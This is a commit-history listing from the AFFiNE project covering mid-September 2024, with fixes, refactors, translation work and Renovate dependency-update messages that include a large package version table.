fix(core): workspace sharing settings should not be displayed when there is no permission ( #8285 )
...
close AF-1222
2024-09-18 07:36:05 +00:00
EYHN
fab23d226d
refactor(core): clear build config ( #8268 )
...
remove build config
allowLocalWorkspace -> FeatureFlag
enablePreloading -> removed
enableNewSettingUnstableApi -> removed
enableExperimentalFeature -> removed
enableThemeEditor -> FeatureFlag
remove some unused code
2024-09-18 06:33:25 +00:00
fundon
46f8237a46
feat(core): add error notification for block not found ( #8254 )
...
Closes [BS-1416](https://linear.app/affine-design/issue/BS-1416/被删除的白板或者-page-里的-block,访问其-link-to-block,跳转之后没有-toast-提示 )
<div class='graphite__hidden'>
<div>🎥 Video uploaded on Graphite:</div>
<a href="https://app.graphite.dev/media/video/8ypiIKZXudF5a0tIgIzf/76e0e8d8-8685-41a2-abc8-79b330854a7e.mov ">
<img src="https://app.graphite.dev/api/v1/graphite/video/thumbnail/8ypiIKZXudF5a0tIgIzf/76e0e8d8-8685-41a2-abc8-79b330854a7e.mov ">
</a>
</div>
<video src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/8ypiIKZXudF5a0tIgIzf/76e0e8d8-8685-41a2-abc8-79b330854a7e.mov ">Screen Recording 2024-09-13 at 21.09.20.mov</video>
2024-09-18 06:20:27 +00:00
forehalo
eb47c0336c
chore(ci): group nestjs dependencies ( #8281 )
2024-09-18 05:44:52 +00:00
renovate[bot]
a70140eda3
chore: bump up oxlint version to v0.9.6 ( #8280 )
...
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2024-09-18 13:43:08 +08:00
pengx17
70fe7cfec4
fix(core): center peek width styles ( #8276 )
...
fix AF-1369
2024-09-18 05:22:10 +00:00
forehalo
e7ac43f0f7
ci: avoid twice by nx ( #8279 )
2024-09-18 05:09:42 +00:00
pengx17
ccd630a2b0
fix(electron): updater not working on startup ( #8274 )
2024-09-18 04:16:54 +00:00
pengx17
7a26c76e53
fix(electron): do not always enable devtools detach mode ( #8273 )
2024-09-18 04:16:51 +00:00
EYHN
714b7b863e
fix(electron): fix electron script path ( #8278 )
2024-09-18 12:14:56 +08:00
forehalo
315c20f8e5
fix(core): avoid side effects ( #8245 )
2024-09-18 03:45:20 +00:00
donteatfriedrice
22e1f9c66b
chore: clean up redundant ai preset utils ( #8275 )
2024-09-18 03:20:19 +00:00
EYHN
e9fce6f58a
fix(electron): fix electron windows build path ( #8272 )
2024-09-18 11:06:56 +08:00
pengx17
8d4bda1dcc
fix(core): enable cloud button should not take space by default ( #8270 )
...
before
<div class='graphite__hidden'>
<div>🎥 Video uploaded on Graphite:</div>
<a href="https://app.graphite.dev/media/video/T2klNLEk0wxLh4NRDzhk/6d818363-30df-4dee-84c1-69eee828f454.mp4 ">
<img src="https://app.graphite.dev/api/v1/graphite/video/thumbnail/T2klNLEk0wxLh4NRDzhk/6d818363-30df-4dee-84c1-69eee828f454.mp4 ">
</a>
</div>
<video src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/T2klNLEk0wxLh4NRDzhk/6d818363-30df-4dee-84c1-69eee828f454.mp4 ">20240917-0548-21.8568797.mp4</video>
---
after
<div class='graphite__hidden'>
<div>🎥 Video uploaded on Graphite:</div>
<a href="https://app.graphite.dev/media/video/T2klNLEk0wxLh4NRDzhk/69c68a4d-d2ea-4439-9c3d-f4a328d76927.mp4 ">
<img src="https://app.graphite.dev/api/v1/graphite/video/thumbnail/T2klNLEk0wxLh4NRDzhk/69c68a4d-d2ea-4439-9c3d-f4a328d76927.mp4 ">
</a>
</div>
<video src="https://graphite-user-uploaded-assets-prod.s3.amazonaws.com/T2klNLEk0wxLh4NRDzhk/69c68a4d-d2ea-4439-9c3d-f4a328d76927.mp4 ">20240917-0549-00.5175618.mp4</video>
2024-09-18 02:10:46 +00:00
Mirai
7a1aa24424
feat(i18n): add full Brazilian Portuguese translation ( #8233 )
...
Co-authored-by: JimmFly <yangjinfei001@gmail.com >
2024-09-16 18:27:12 +08:00
EYHN
ed63602f01
refactor: remove unused deps ( #8259 )
...
auto removed by https://knip.dev/features/auto-fix
2024-09-14 14:52:50 +00:00
forehalo
58025729b0
fix(electron): wrong app path ( #8260 )
2024-09-14 06:28:46 +00:00
EYHN
3d80725c1a
refactor(core): move mobile components to core ( #8258 )
2024-09-14 05:51:14 +00:00
forehalo
ff15ea1eec
fix(core): avoid extra redirect proxy ( #8252 )
2024-09-14 01:36:00 +00:00
fundon
d2cb7b7683
chore(core): improve scroll anchoring ( #8132 )
...
Upstreams: https://github.com/toeverything/blocksuite/pull/8335
* set `padding` to `[20,20,100,20]`
* cancel smooth movement and scaling
* focus and zoom in on elements/blocks
2024-09-13 13:13:02 +00:00
pengx17
d2bd39a1c7
fix(core): importing template with default mode ( #8250 )
2024-09-13 12:54:21 +00:00
darkskygit
ae3f48d0cc
feat: skip rendering if value render is not defiend ( #8244 )
...
fix AF-1387
2024-09-13 12:42:22 +00:00
darkskygit
7bc28d7935
feat: add language hint for prompt ( #8216 )
...
fix PD-1708
2024-09-13 12:30:13 +00:00
Saul-Mirone
bafed8ed01
chore: bump bs to 0.17.10 ( #8251 )
...
- e0d0016: - Fix database performance issue
- Fix frame panel display issue
- Fix editor settings for color with transparency
- Fix portal in modals
- Fix group selection rendering delay
- Remove unused and duplicated code
- Improve frame model
- Improve ParseDocUrl service
- Support custom max zoom
2024-09-13 12:13:22 +00:00
forehalo
85b9f21078
fix(component): storybook build config ( #8247 )
2024-09-13 11:56:25 +00:00
fundon
85448e2d6b
fix(core): should wrap link text ( #8249 )
...
Closes [BS-1418](https://linear.app/affine-design/issue/BS-1418/link-to-block-粘贴识别后,使用-undo-来撤销操作的效果不一样 )
https://github.com/user-attachments/assets/537cf8f4-cf13-466f-b68e-fc213891c548
2024-09-13 11:44:23 +00:00
EYHN
5e56ec65e3
refactor(core): adjust core struct ( #8218 )
...
packages/frontend/core/src
hooks -> components/hooks
atoms -> components/atoms
layouts -> components/layouts
providers -> components/providers
mixpanel -> @affine/track
~~shared~~
~~unexpected-application-state~~
2024-09-13 11:31:21 +00:00
darkskygit
fc7e7a37ee
feat: remove avatar for empty field ( #8246 )
2024-09-13 11:18:22 +00:00
EYHN
58db654b07
fix(core): share mode page reference ( #8238 )
2024-09-13 11:06:19 +00:00
pengx17
0a585a14a6
fix(core): reference node word break ( #8236 )
...
before:

---
after:

2024-09-13 10:54:22 +00:00
pengx17
2ac4a846f7
feat(core): copy event for image ( #8219 )
...
fix AF-1383
2024-09-13 10:28:28 +00:00
pengx17
b1e61245ee
fix: button tooltip should not show on showing image preview ( #8224 )
...
when showing image preview in modal, the following code
660060a765/packages/react/focus-scope/src/FocusScope.tsx (L143) will find the first tabbable element and focus, which will trigger the button's tooltip
Adding tabIndex to the image to fix this issue
2024-09-13 10:11:18 +00:00
EYHN
6fde967a6d
feat(core): remove loop animations ( #8242 )
2024-09-13 09:54:24 +00:00
pengx17
3c1cd6b648
fix(electron): pinned tab style ( #8232 )
...
fix PD-1687
2024-09-13 09:40:27 +00:00
forehalo
1d7932851e
chore: remove type module in scripts ( #8240 )
...
fix AF-1385
2024-09-13 09:21:29 +00:00
forehalo
2ce9d37af1
fix(core): circular dependencies ( #8215 )
2024-09-13 09:03:23 +00:00
forehalo
a387e4ac07
refactor: migrate environment to BUILD_CONFIG ( #8206 )
2024-09-13 07:58:20 +00:00
EYHN
561f96bb71
feat(core): load ydoc on demand ( #8241 )
2024-09-13 07:45:49 +00:00
forehalo
25969a34e8
refactor: avoid runtime config object ( #8202 )
2024-09-13 07:27:11 +00:00
forehalo
c76b4d70b0
refactor: setup files ( #8201 )
2024-09-13 07:27:08 +00:00
renovate
3c7cf658c5
chore: Lock file maintenance ( #8165 )
...
This PR contains the following updates:
| Update | Change |
|---|---|
| lockFileMaintenance | All locks refreshed |
🔧 This Pull Request updates lock files to use the latest dependency versions.
---
### Configuration
📅 **Schedule**: Branch creation - "before 4am on Monday" (UTC), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions ) if that's undesired.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC41OS4yIiwidXBkYXRlZEluVmVyIjoiMzguNTkuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-09-13 07:11:05 +00:00
renovate
62f5095195
chore: bump up all non-major dependencies ( #8130 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence | Type | Update |
|---|---|---|---|---|---|---|---|
| [@aws-sdk/client-s3](https://redirect.github.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://redirect.github.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.645.0` -> `3.651.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.645.0/3.651.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@aws-sdk/client-s3](https://redirect.github.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://redirect.github.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.645.0` -> `3.651.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.645.0/3.651.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@chromatic-com/storybook](https://redirect.github.com/chromaui/addon-visual-tests ) | [`1.8.0` -> `1.9.0`](https://renovatebot.com/diffs/npm/@chromatic-com%2fstorybook/1.8.0/1.9.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@commitlint/cli](https://commitlint.js.org/ ) ([source](https://redirect.github.com/conventional-changelog/commitlint/tree/HEAD/@commitlint/cli )) | [`19.4.1` -> `19.5.0`](https://renovatebot.com/diffs/npm/@commitlint%2fcli/19.4.1/19.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@commitlint/config-conventional](https://commitlint.js.org/ ) ([source](https://redirect.github.com/conventional-changelog/commitlint/tree/HEAD/@commitlint/config-conventional )) | [`19.4.1` -> `19.5.0`](https://renovatebot.com/diffs/npm/@commitlint%2fconfig-conventional/19.4.1/19.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@marsidev/react-turnstile](https://redirect.github.com/marsidev/react-turnstile ) | [`1.0.1` -> `1.0.2`](https://renovatebot.com/diffs/npm/@marsidev%2freact-turnstile/1.0.1/1.0.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@nx/vite](https://nx.dev ) ([source](https://redirect.github.com/nrwl/nx/tree/HEAD/packages/vite )) | [`19.6.5` -> `19.7.3`](https://renovatebot.com/diffs/npm/@nx%2fvite/19.6.5/19.7.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@playwright/test](https://playwright.dev ) ([source](https://redirect.github.com/microsoft/playwright )) | [`=1.46.1` -> `=1.47.0`](https://renovatebot.com/diffs/npm/@playwright%2ftest/1.46.1/1.47.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@sentry/react](https://redirect.github.com/getsentry/sentry-javascript/tree/master/packages/react ) ([source](https://redirect.github.com/getsentry/sentry-javascript )) | [`8.28.0` -> `8.30.0`](https://renovatebot.com/diffs/npm/@sentry%2freact/8.28.0/8.30.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@sentry/react](https://redirect.github.com/getsentry/sentry-javascript/tree/master/packages/react ) ([source](https://redirect.github.com/getsentry/sentry-javascript )) | [`8.28.0` -> `8.30.0`](https://renovatebot.com/diffs/npm/@sentry%2freact/8.28.0/8.30.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@slack/web-api](https://slack.dev/node-slack-sdk/web-api ) ([source](https://redirect.github.com/slackapi/node-slack-sdk )) | [`7.3.4` -> `7.4.0`](https://renovatebot.com/diffs/npm/@slack%2fweb-api/7.3.4/7.4.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@storybook/addon-actions](https://redirect.github.com/storybookjs/storybook/tree/next/code/addons/actions ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/addons/actions )) | [`8.2.9` -> `8.3.0`](https://renovatebot.com/diffs/npm/@storybook%2faddon-actions/8.2.9/8.3.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@storybook/addon-essentials](https://redirect.github.com/storybookjs/storybook/tree/next/code/addons/essentials ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/addons/essentials )) | [`8.2.9` -> `8.3.0`](https://renovatebot.com/diffs/npm/@storybook%2faddon-essentials/8.2.9/8.3.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@storybook/addon-interactions](https://redirect.github.com/storybookjs/storybook/tree/next/code/addons/interactions ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/addons/interactions )) | [`8.2.9` -> `8.3.0`](https://renovatebot.com/diffs/npm/@storybook%2faddon-interactions/8.2.9/8.3.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@storybook/addon-links](https://redirect.github.com/storybookjs/storybook/tree/next/code/addons/links ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/addons/links )) | [`8.2.9` -> `8.3.0`](https://renovatebot.com/diffs/npm/@storybook%2faddon-links/8.2.9/8.3.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@storybook/addon-mdx-gfm](https://redirect.github.com/storybookjs/storybook/tree/next/code/addons/gfm ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/addons/gfm )) | [`8.2.9` -> `8.3.0`](https://renovatebot.com/diffs/npm/@storybook%2faddon-mdx-gfm/8.2.9/8.3.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@storybook/addon-storysource](https://redirect.github.com/storybookjs/storybook/tree/next/code/addons/storysource ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/addons/storysource )) | [`8.2.9` -> `8.3.0`](https://renovatebot.com/diffs/npm/@storybook%2faddon-storysource/8.2.9/8.3.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@storybook/blocks](https://redirect.github.com/storybookjs/storybook/tree/next/code/lib/blocks ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/lib/blocks )) | [`8.2.9` -> `8.3.0`](https://renovatebot.com/diffs/npm/@storybook%2fblocks/8.2.9/8.3.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@storybook/react](https://redirect.github.com/storybookjs/storybook/tree/next/code/renderers/react ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/renderers/react )) | [`8.2.9` -> `8.3.0`](https://renovatebot.com/diffs/npm/@storybook%2freact/8.2.9/8.3.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@storybook/react-vite](https://redirect.github.com/storybookjs/storybook/tree/next/code/frameworks/react-vite ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/frameworks/react-vite )) | [`8.2.9` -> `8.3.0`](https://renovatebot.com/diffs/npm/@storybook%2freact-vite/8.2.9/8.3.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@swc/core](https://swc.rs ) ([source](https://redirect.github.com/swc-project/swc )) | [`1.7.23` -> `1.7.26`](https://renovatebot.com/diffs/npm/@swc%2fcore/1.7.23/1.7.26 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@vitest/coverage-istanbul](https://redirect.github.com/vitest-dev/vitest/tree/main/packages/coverage-istanbul#readme ) ([source](https://redirect.github.com/vitest-dev/vitest/tree/HEAD/packages/coverage-istanbul )) | [`2.0.5` -> `2.1.0`](https://renovatebot.com/diffs/npm/@vitest%2fcoverage-istanbul/2.0.5/2.1.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@vitest/ui](https://redirect.github.com/vitest-dev/vitest/tree/main/packages/ui#readme ) ([source](https://redirect.github.com/vitest-dev/vitest/tree/HEAD/packages/ui )) | [`2.0.5` -> `2.1.0`](https://renovatebot.com/diffs/npm/@vitest%2fui/2.0.5/2.1.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [anyhow](https://redirect.github.com/dtolnay/anyhow ) | `1.0.86` -> `1.0.88` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [commitlint](https://commitlint.js.org/ ) ([source](https://redirect.github.com/conventional-changelog/commitlint/tree/HEAD/@alias/commitlint )) | [`19.4.1` -> `19.5.0`](https://renovatebot.com/diffs/npm/commitlint/19.4.1/19.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [debug](https://redirect.github.com/debug-js/debug ) | [`4.3.6` -> `4.3.7`](https://renovatebot.com/diffs/npm/debug/4.3.6/4.3.7 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [electron](https://redirect.github.com/electron/electron ) | [`31.4.0` -> `31.6.0`](https://renovatebot.com/diffs/npm/electron/31.4.0/31.6.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [electron-log](https://redirect.github.com/megahertz/electron-log ) | [`5.1.7` -> `5.2.0`](https://renovatebot.com/diffs/npm/electron-log/5.1.7/5.2.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [file-type](https://redirect.github.com/sindresorhus/file-type ) | [`19.4.1` -> `19.5.0`](https://renovatebot.com/diffs/npm/file-type/19.4.1/19.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [foxact](https://foxact.skk.moe ) ([source](https://redirect.github.com/SukkaW/foxact )) | [`0.2.37` -> `0.2.38`](https://renovatebot.com/diffs/npm/foxact/0.2.37/0.2.38 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [happy-dom](https://redirect.github.com/capricorn86/happy-dom ) | [`15.7.3` -> `15.7.4`](https://renovatebot.com/diffs/npm/happy-dom/15.7.3/15.7.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [html-validate](https://html-validate.org ) ([source](https://gitlab.com/html-validate/html-validate )) | [`8.21.0` -> `8.22.0`](https://renovatebot.com/diffs/npm/html-validate/8.21.0/8.22.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [husky](https://redirect.github.com/typicode/husky ) | [`9.1.5` -> `9.1.6`](https://renovatebot.com/diffs/npm/husky/9.1.5/9.1.6 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [i18next](https://www.i18next.com ) ([source](https://redirect.github.com/i18next/i18next )) | [`23.14.0` -> `23.15.1`](https://renovatebot.com/diffs/npm/i18next/23.14.0/23.15.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [lucide-react](https://lucide.dev ) ([source](https://redirect.github.com/lucide-icons/lucide/tree/HEAD/packages/lucide-react )) | [`^0.438.0` -> `^0.441.0`](https://renovatebot.com/diffs/npm/lucide-react/0.438.0/0.441.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [marked](https://marked.js.org ) ([source](https://redirect.github.com/markedjs/marked )) | [`14.1.1` -> `14.1.2`](https://renovatebot.com/diffs/npm/marked/14.1.1/14.1.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [msw](https://mswjs.io ) ([source](https://redirect.github.com/mswjs/msw )) | [`2.4.2` -> `2.4.5`](https://renovatebot.com/diffs/npm/msw/2.4.2/2.4.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [napi](https://redirect.github.com/napi-rs/napi-rs ) | `3.0.0-alpha.8` -> `3.0.0-alpha.9` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [napi-derive](https://redirect.github.com/napi-rs/napi-rs ) | `3.0.0-alpha.7` -> `3.0.0-alpha.8` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [nx](https://nx.dev ) ([source](https://redirect.github.com/nrwl/nx/tree/HEAD/packages/nx )) | [`19.6.5` -> `19.7.3`](https://renovatebot.com/diffs/npm/nx/19.6.5/19.7.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [nx-cloud](https://nx.app ) | [`19.0.0` -> `19.1.0`](https://renovatebot.com/diffs/npm/nx-cloud/19.0.0/19.1.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [openai](https://redirect.github.com/openai/openai-node ) | [`4.57.3` -> `4.60.0`](https://renovatebot.com/diffs/npm/openai/4.57.3/4.60.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [playwright](https://playwright.dev ) ([source](https://redirect.github.com/microsoft/playwright )) | [`=1.46.1` -> `=1.47.0`](https://renovatebot.com/diffs/npm/playwright/1.46.1/1.47.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [react-day-picker](https://daypicker.dev ) ([source](https://redirect.github.com/gpbl/react-day-picker )) | [`9.0.8` -> `9.0.9`](https://renovatebot.com/diffs/npm/react-day-picker/9.0.8/9.0.9 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [react-router-dom](https://redirect.github.com/remix-run/react-router ) ([source](https://redirect.github.com/remix-run/react-router/tree/HEAD/packages/react-router-dom )) | [`6.26.1` -> `6.26.2`](https://renovatebot.com/diffs/npm/react-router-dom/6.26.1/6.26.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
